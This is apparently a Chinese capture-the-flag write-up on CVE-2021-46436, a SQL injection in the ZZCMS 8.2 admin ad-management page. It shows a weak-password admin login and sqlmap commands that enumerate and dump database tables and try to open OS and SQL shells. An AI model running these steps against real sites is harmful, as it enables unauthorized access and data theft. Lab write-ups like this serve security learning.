CVE-2021-46436
靶标介绍:
站长招商网内容管理系统简称 ZZCMS,由ZZCMS团队开发,融入数据库优化,内容缓存,AJAX等技术,使网站的安全性 、稳定性 、负载能力得到可靠保障。源码开放,功能模块独立,便于二次开发。 zzcms8.2中在admin/ad_manage.php存在sql注入漏洞
得到目标后根据已知的
直接访问网址:http://xxx/admin/ad_manage.php ,跳转到登录窗口,弱口令:admin/admin 登录成功
继续访问:http://xxx/admin/ad_manage.php 网址,测试了添加广告和查询的功能,发现查询这里有输入参数,最可能存在SQL注入。因此我们直接随便输入值后进行抓包。
抓包后如图,将抓包的内容保存为1.txt 用sqlmap 跑出来即可
Sqlmap:
sqlmap.py -r 1.txt --random-agent --batch
可以尝试 --os-shell
和 sql-shell
发现 --os-shell
没有写入的权限,因此我们拿不到webshell,所以flag 大概率会在数据库中,因此先查下数据库
sqlmap.py -r 1.txt --random-agent --batch --dbs
不存在ctf数据库,拿可能是在zzcms 当中,所以继续查看,这里已经跑出flag,确定flag 是再zzcms 当中,所以运行第二个把flag导出。这次的这个注入跑出来是延时注入,应该是一个个字符跑出来的,所以会比较慢。
sqlmap.py -r 1.txt --random-agent --batch -D zzcms --tables
sqlmap.py -r 1.txt --random-agent --batch -D zzcms -T flag --dump
最终跑出来的flag